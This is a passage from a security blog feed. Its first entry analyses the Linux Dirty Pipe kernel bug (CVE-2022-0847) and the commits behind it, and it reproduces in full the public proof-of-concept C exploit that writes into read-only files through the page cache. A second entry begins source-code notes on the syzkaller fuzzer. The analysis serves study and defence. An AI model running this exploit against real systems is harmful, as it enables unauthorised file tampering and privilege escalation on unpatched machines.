IOCB_DIRECT)</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">ext4_dio_read_iter</span>(iocb, to);</span><br><span class="line">    <span class="comment">// reads without O_DIRECT take this path</span></span><br><span 
class="line">    <span class="keyword">return</span> <span class="built_in">generic_file_read_iter</span>(iocb, to);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>That function in turn calls <code>generic_file_read_iter</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * generic_file_read_iter - generic filesystem read routine</span></span><br><span class="line"><span class="comment"> * @iocb:    kernel I/O control block</span></span><br><span class="line"><span class="comment"> * @iter:    destination for the data read</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * This is the &quot;read_iter()&quot; routine for all filesystems</span></span><br><span class="line"><span class="comment"> * that can use the page cache directly.</span></span><br><span class="line"><span class="comment"> * Return:</span></span><br><span class="line"><span 
class="comment"> * * number of bytes copied, even for partial reads</span></span><br><span class="line"><span class="comment"> * * negative error code if nothing was read</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">ssize_t</span></span></span><br><span class="line"><span class="function"><span class="title">generic_file_read_iter</span><span class="params">(<span class="keyword">struct</span> kiocb *iocb, <span class="keyword">struct</span> iov_iter *iter)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">size_t</span> count = <span class="built_in">iov_iter_count</span>(iter);</span><br><span class="line">    <span class="type">ssize_t</span> retval = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!count)</span><br><span class="line">        <span class="keyword">goto</span> out; <span class="comment">/* skip atime */</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (iocb-&gt;ki_flags &amp; IOCB_DIRECT) &#123;</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// continue down the call chain</span></span><br><span class="line">    retval = <span class="built_in">generic_file_buffered_read</span>(iocb, iter, retval);</span><br><span class="line">out:</span><br><span class="line">    <span class="keyword">return</span> retval;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>which then calls <code>generic_file_buffered_read</code>. That function is too long to paste here, so I will only summarize what it does:</p><ul><li>It looks in <strong>the file's existing page cache mapping</strong> for a page that was cached earlier.<ul><li>If there is no cached page, it reads the file data from disk and creates a new page cache page.</li><li>If a cached page exists but is out of date, it refreshes that page.</li></ul></li><li>At this point a cached page is guaranteed to exist, so it calls <strong>copy_page_to_iter</strong> to transfer the data on that page into the
pipe.</li></ul><p>This is exactly the function introduced earlier, so the whole splice system call can now be tied to the uninitialized-field bug on the pipe side.</p><h2 id="四、漏洞成因">IV. Root Cause</h2><p>This vulnerability did not appear in one step; it results from the combination of two commits:</p><ul><li><p><a href="https://github.com/torvalds/linux/commit/241699cd72a8489c9446ae3910ddd243e9b9061b">new iov_iter flavour: pipe-backed - linux commit 241699</a>: introduced the uninitialized-field bug. Both <code>push_pipe</code> and <code>copy_page_to_iter_pipe</code> fill in a <code>pipe_buffer</code> structure without initializing its <code>flags</code> field.</p></li><li><p><a href="https://github.com/torvalds/linux/commit/f6dd975583bd8ce088400648fd9819e4691c8958">pipe: merge anon_pipe_buf*_ops - linux commit f6dd97</a>: before this commit, the kernel decided whether a <code>pipe_buf</code> was <strong>mergeable</strong> by comparing the address stored in <code>pipe_buf-&gt;ops</code>. <strong>That design was not elegant</strong>, because mergeable or not, the ops tables that <code>pipe_buf-&gt;ops</code> could point to contained exactly the same function pointers:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// fs/pipe.c</span></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">pipe_buf_operations</span> anon_pipe_buf_ops = &#123;</span><br><span class="line">  .confirm = generic_pipe_buf_confirm,</span><br><span class="line">  .release = anon_pipe_buf_release,</span><br><span class="line">  .steal 
= anon_pipe_buf_steal,</span><br><span class="line">  .get = generic_pipe_buf_get,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">pipe_buf_operations</span> anon_pipe_buf_nomerge_ops = &#123;</span><br><span class="line">  .confirm = generic_pipe_buf_confirm,</span><br><span class="line">  .release = anon_pipe_buf_release,</span><br><span class="line">  .steal = anon_pipe_buf_steal,</span><br><span class="line">  .get = generic_pipe_buf_get,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">pipe_buf_operations</span> packet_pipe_buf_ops = &#123;</span><br><span class="line">  .confirm = generic_pipe_buf_confirm,</span><br><span class="line">  .release = anon_pipe_buf_release,</span><br><span class="line">  .steal = anon_pipe_buf_steal,</span><br><span class="line">  .get = generic_pipe_buf_get,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>As you can see, this trick is rather inelegant, so commit f6dd97 refactored this code and introduced a new pipe buf flag, <code>PIPE_BUF_FLAG_CAN_MERGE</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// include/linux/pipe_fs_i.h</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_LRU       0x01  <span class="comment">/* page is on the LRU */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> 
PIPE_BUF_FLAG_ATOMIC    0x02  <span class="comment">/* was atomically mapped */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_GIFT      0x04  <span class="comment">/* page is a gift */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_PACKET    0x08  <span class="comment">/* read() as a packet */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_CAN_MERGE 0x10  <span class="comment">/* can merge buffers */</span>     <span class="comment">// &lt;= the newly introduced flag</span></span></span><br></pre></td></tr></table></figure><p>The refactoring itself is correct; <strong>its only side effect is the new pipe buf flag, PIPE_BUF_FLAG_CAN_MERGE</strong>.</p></li></ul><p>Although the first commit introduced the uninitialized field, the bug could not do much damage on its own, because <strong>none of the pipe buf flags available at the time was useful to an attacker</strong>. Once the second commit added the new pipe buf flag <code>PIPE_BUF_FLAG_CAN_MERGE</code>, the uninitialized field became critical: a newly filled pipe_buf can inherit stale flags such as <code>PIPE_BUF_FLAG_CAN_MERGE</code>, which <strong>breaks the integrity of the pipe buf</strong> and <strong>allows writes to pages that should never be written</strong> (pages that should never carry PIPE_BUF_FLAG_CAN_MERGE, such as page cache pages).</p><p>Note that the <strong>read-only pages</strong> mentioned here are <strong>not protected from writes by permission checks or similar mechanisms</strong> inside the pipe; they are protected <strong>only by the logic the pipe implements</strong>. So when that logic goes wrong, the pipe can write to a read-only page, which yields an arbitrary file write.</p><h2 id="五、漏洞利用">V. Exploitation</h2><p>From the code analysis above we can derive the following exploit chain:</p><ol><li><p>Create a pipe (<strong>do not</strong> pass O_DIRECT).</p></li><li><p><strong>Fill the pipe with data</strong> so that <strong>every pipe buf in the pipe structure has PIPE_BUF_FLAG_CAN_MERGE set in its flags</strong>.</p></li><li><p><strong>Read all of the data back out of the pipe</strong>, releasing every pipe buf.</p></li><li><p>Call splice to move data from a <strong>readable</strong> file into the pipe, using <strong>a length that is not aligned to the page size</strong>. The pipe buf at the head of the pipe will then have <strong>its page pointing at the page cache</strong> and <strong>its flags equal to PIPE_BUF_FLAG_CAN_MERGE</strong>.</p><blockquote><p>Because flags is not initialized when a pipe buf is reused, it still holds
PIPE_BUF_FLAG_CAN_MERGE here.</p></blockquote></li><li><p>Write the <strong>target data</strong> to the pipe. Because PIPE_BUF_FLAG_CAN_MERGE is still set, the newly written data is <strong>merged directly into the page cache page that the pipe buf points to</strong>.</p></li><li><p>Any later access to the file makes <strong>the kernel return the modified data from the page cache</strong>, which amounts to an arbitrary file write at the kernel level.</p></li></ol><blockquote><p>Note that modifying the page cache “by accident” through this bug <strong>does not cause the page to be written back to disk</strong>. Only when some other part of the kernel <strong>deliberately writes</strong> to that page, marking it <strong>dirty</strong>, is the modified page saved back to disk.</p><p>The kernel decides whether a page cache page is dirty by checking its dirty flag, not by checking whether its data has changed. Overwriting the page through the Dirty Pipe bug does not touch that flag.</p></blockquote><p>Since cm4all has already published a very clear POC, I reproduce it here:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span 
class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span 
class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/user.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> PAGE_SIZE</span></span><br><span class="line"><span class="meta">#<span 
class="keyword">define</span> PAGE_SIZE 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Create a pipe where all &quot;bufs&quot; on the pipe_inode_info ring have the</span></span><br><span class="line"><span class="comment"> * PIPE_BUF_FLAG_CAN_MERGE flag set.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">prepare_pipe</span><span class="params">(<span class="type">int</span> p[<span class="number">2</span>])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">pipe</span>(p)) <span class="built_in">abort</span>();</span><br><span class="line"></span><br><span class="line">    <span class="type">const</span> <span class="type">unsigned</span> pipe_size = <span class="built_in">fcntl</span>(p[<span class="number">1</span>], F_GETPIPE_SZ);</span><br><span class="line">    <span class="type">static</span> <span class="type">char</span> buffer[<span class="number">4096</span>];</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* fill the pipe completely; each pipe_buffer will now have</span></span><br><span class="line"><span class="comment">       the PIPE_BUF_FLAG_CAN_MERGE flag */</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">unsigned</span> r = pipe_size; r &gt; <span class="number">0</span>;) &#123;</span><br><span class="line">        <span class="type">unsigned</span> n = r &gt; <span class="built_in">sizeof</span>(buffer) ? 
<span class="built_in">sizeof</span>(buffer) : r;</span><br><span class="line">        <span class="built_in">write</span>(p[<span class="number">1</span>], buffer, n);</span><br><span class="line">        r -= n;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* drain the pipe, freeing all pipe_buffer instances (but</span></span><br><span class="line"><span class="comment">       leaving the flags initialized) */</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">unsigned</span> r = pipe_size; r &gt; <span class="number">0</span>;) &#123;</span><br><span class="line">        <span class="type">unsigned</span> n = r &gt; <span class="built_in">sizeof</span>(buffer) ? <span class="built_in">sizeof</span>(buffer) : r;</span><br><span class="line">        <span class="built_in">read</span>(p[<span class="number">0</span>], buffer, n);</span><br><span class="line">        r -= n;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* the pipe is now empty, and if somebody adds a new</span></span><br><span class="line"><span class="comment">       pipe_buffer without initializing its &quot;flags&quot;, the buffer</span></span><br><span class="line"><span class="comment">       will be mergeable */</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (argc != <span class="number">4</span>) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Usage: %s 
TARGETFILE OFFSET DATA\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* dumb command-line argument parser */</span></span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *<span class="type">const</span> path = argv[<span class="number">1</span>];</span><br><span class="line">    <span class="type">loff_t</span> offset = <span class="built_in">strtoul</span>(argv[<span class="number">2</span>], <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *<span class="type">const</span> data = argv[<span class="number">3</span>];</span><br><span class="line">    <span class="type">const</span> <span class="type">size_t</span> data_size = <span class="built_in">strlen</span>(data);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (offset % PAGE_SIZE == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Sorry, cannot start writing at a page boundary\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">const</span> <span class="type">loff_t</span> next_page = (offset | (PAGE_SIZE - <span class="number">1</span>)) + <span class="number">1</span>;</span><br><span class="line">    <span class="type">const</span> <span class="type">loff_t</span> end_offset = offset + (<span class="type">loff_t</span>)data_size;</span><br><span class="line">    <span class="keyword">if</span> (end_offset &gt; next_page) 
&#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Sorry, cannot write across a page boundary\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* open the input file and validate the specified offset */</span></span><br><span class="line">    <span class="type">const</span> <span class="type">int</span> fd = <span class="built_in">open</span>(path, O_RDONLY); <span class="comment">// yes, read-only! :-)</span></span><br><span class="line">    <span class="keyword">if</span> (fd &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;open failed&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">stat</span> st;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">fstat</span>(fd, &amp;st)) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;stat failed&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (offset &gt; st.st_size) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Offset is not inside the file\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span 
class="line"></span><br><span class="line">    <span class="keyword">if</span> (end_offset &gt; st.st_size) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Sorry, cannot enlarge the file\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* create the pipe with all flags initialized with</span></span><br><span class="line"><span class="comment">       PIPE_BUF_FLAG_CAN_MERGE */</span></span><br><span class="line">    <span class="type">int</span> p[<span class="number">2</span>];</span><br><span class="line">    <span class="built_in">prepare_pipe</span>(p);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* splice one byte from before the specified offset into the</span></span><br><span class="line"><span class="comment">       pipe; this will add a reference to the page cache, but</span></span><br><span class="line"><span class="comment">       since copy_page_to_iter_pipe() does not initialize the</span></span><br><span class="line"><span class="comment">       &quot;flags&quot;, PIPE_BUF_FLAG_CAN_MERGE is still set */</span></span><br><span class="line">    --offset;</span><br><span class="line">    <span class="type">ssize_t</span> nbytes = <span class="built_in">splice</span>(fd, &amp;offset, p[<span class="number">1</span>], <span class="literal">NULL</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (nbytes &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;splice failed&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    
&#125;</span><br><span class="line">    <span class="keyword">if</span> (nbytes == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;short splice\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* the following write will not create a new pipe_buffer, but</span></span><br><span class="line"><span class="comment">       will instead write into the page cache, because of the</span></span><br><span class="line"><span class="comment">       PIPE_BUF_FLAG_CAN_MERGE flag */</span></span><br><span class="line">    nbytes = <span class="built_in">write</span>(p[<span class="number">1</span>], data, data_size);</span><br><span class="line">    <span class="keyword">if</span> (nbytes &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;write failed&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ((<span class="type">size_t</span>)nbytes &lt; data_size) &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;short write\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;It worked!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> EXIT_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The result of running it is shown below:</p><p><img 
src="/2022/04/dirty-pipe/image-20220403152547117.png" alt="image-20220403152547117"></p><p>As the output shows, the exploit runs without a hitch: even though the file was opened <strong>read-only</strong>, the program still manages to <strong>write</strong> to it.</p><h2 id="七、参考">VII. References</h2><ul><li><a href="https://dirtypipe.cm4all.com/">The Dirty Pipe Vulnerability - cm4all</a></li><li><a href="https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit">CVE-2022-0847-DirtyPipe-Exploit - github</a></li><li>linux github commits<ul><li><a href="https://github.com/torvalds/linux/commit/241699cd72a8489c9446ae3910ddd243e9b9061b">new iov_iter flavour: pipe-backed - linux commit</a></li><li><a href="https://github.com/torvalds/linux/commit/f6dd975583bd8ce088400648fd9819e4691c8958">pipe: merge anon_pipe_buf*_ops - linux commit</a></li><li><a href="https://github.com/torvalds/linux/commit/9d2231c5d74e13b2a0546fee6737ee4446017903">lib/iov_iter: initialize “flags” in new pipe_buffer - linux commit</a></li></ul></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;Dirty Pipe is a privilege escalation vulnerability in the Linux kernel. Its impact is comparable to that of Dirty COW, but it is considerably easier to exploit.&lt;/p&gt;
&lt;p&gt;Affected range: &lt;a href=&quot;https://github.com/torvalds/linux/commit/f6dd975583bd8ce088400648fd9819e4691c8958&quot;&gt;pipe: merge anon_pipe_buf*_ops - linux commit&lt;/a&gt; (v5.8-rc1) ~ &lt;a href=&quot;https://github.com/torvalds/linux/commit/9d2231c5d74e13b2a0546fee6737ee4446017903&quot;&gt;lib/iov_iter: initialize “flags” in new pipe_buffer&lt;/a&gt; (v5.17-rc6)&lt;/p&gt;
&lt;p&gt;In terms of dates, this is roughly 2020/5/21 - 2022/2/21.&lt;/p&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="linux" scheme="https://kiprey.github.io/tags/linux/"/>
    
  </entry>
  
  <entry>
    <title>syzkaller Source Code Reading Notes - 1</title>
    <link href="https://kiprey.github.io/2022/03/syzkaller-1/"/>
    <id>https://kiprey.github.io/2022/03/syzkaller-1/</id>
    <published>2022-03-14T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.097Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p><a href="https://github.com/google/syzkaller">syzkaller</a> is an unsupervised, coverage-guided kernel fuzzer open-sourced by Google. It supports testing several operating systems, including Linux and Windows.</p><p>syzkaller is made up of many components, including:</p><ul><li>syz-extract: resolves the constants used in syzlang descriptions</li><li>syz-sysgen: parses syzlang and extracts the syscalls it describes, their argument types, and the dependencies between arguments</li><li>syz-manager: launches and manages syzkaller</li><li>syz-fuzzer: the fuzzer that actually runs inside the VM</li><li>syz-executor: the test program that actually runs inside the VM</li></ul><p>The architecture is shown below:</p><p><img src="/2022/03/syzkaller-1/process_structure.png" alt="syzkaller process structure"></p><p>In this post I will start with the source code of <strong>syz-extract and syz-sysgen</strong>.</p><span id="more"></span><blockquote><p>Throughout this series of source code reading notes, the arch and platform are always <strong>x86_64 linux</strong>; this will not be repeated.</p><p>syzkaller git checkout: 3a9d0024ba818c5b37058d9ac6fdfc0ddfa78be6</p><p>checkout Date:   Fri Nov 19 13:06:38 2021 +0100</p></blockquote><h2 id="二、syz-extract">II. syz-extract</h2><p>Purpose: resolve the constants in syzlang files to their concrete integer values and store the results in xxx.txt.const files.</p><h3 id="1-main">1. main</h3><blockquote><p>The syz-extract main function is located in <code>sys/syz-extract/extract.go</code>.</p></blockquote><p>First, syz-extract parses its command-line arguments:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in Function `main` </span></span><br><span class="line">flag.Parse()</span><br><span class="line"><span class="keyword">if</span> *flagBuild &amp;&amp; *flagBuildDir != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">    tool.Failf(<span class="string">&quot;-build and -builddir is an invalid combination&quot;</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The flags are defined as follows:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> (</span><br><span class="line">    flagOS        = flag.String(<span class="string">&quot;os&quot;</span>, runtime.GOOS, <span class="string">&quot;target OS&quot;</span>)</span><br><span class="line">    flagBuild     = flag.Bool(<span class="string">&quot;build&quot;</span>, <span class="literal">false</span>, <span class="string">&quot;regenerate arch-specific kernel headers&quot;</span>)</span><br><span class="line">    flagSourceDir = flag.String(<span class="string">&quot;sourcedir&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;path to kernel source checkout dir&quot;</span>)</span><br><span class="line">    flagIncludes  = flag.String(<span class="string">&quot;includedirs&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;path to other kernel source include dirs separated by commas&quot;</span>)</span><br><span class="line">    flagBuildDir  = flag.String(<span class="string">&quot;builddir&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;path to kernel build dir&quot;</span>)</span><br><span class="line">    flagArch      = flag.String(<span class="string">&quot;arch&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;comma-separated list of arches to generate (all by default)&quot;</span>)</span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>Next, main calls archFileList, which processes the arguments passed in and produces the corresponding return values.</p><blockquote><p>Here:</p><ul><li>OS is the operating system name, a <strong>string</strong></li><li>archArray is the list of arches to generate, a <strong>string slice</strong></li><li>files is the list of syzlang file names to analyze, a <strong>string slice</strong></li></ul></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in Function `main` </span></span><br><span class="line">OS, archArray, files, err := archFileList(*flagOS, *flagArch, flag.Args())</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">    tool.Fail(err)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Next, main looks up the Extractor registered for OS. If the OS is unknown, the map lookup yields nil and the tool exits with an error:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in Function `main` </span></span><br><span class="line">extractor := extractors[OS]</span><br><span class="line"><span class="keyword">if</span> extractor == <span class="literal">nil</span> &#123;</span><br><span class="line">    tool.Failf(<span class="string">&quot;unknown os: %v&quot;</span>, OS)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The extractors map is shown below. It associates each OS with its own implementation of the Extractor interface. The Linux implementation (that is, the 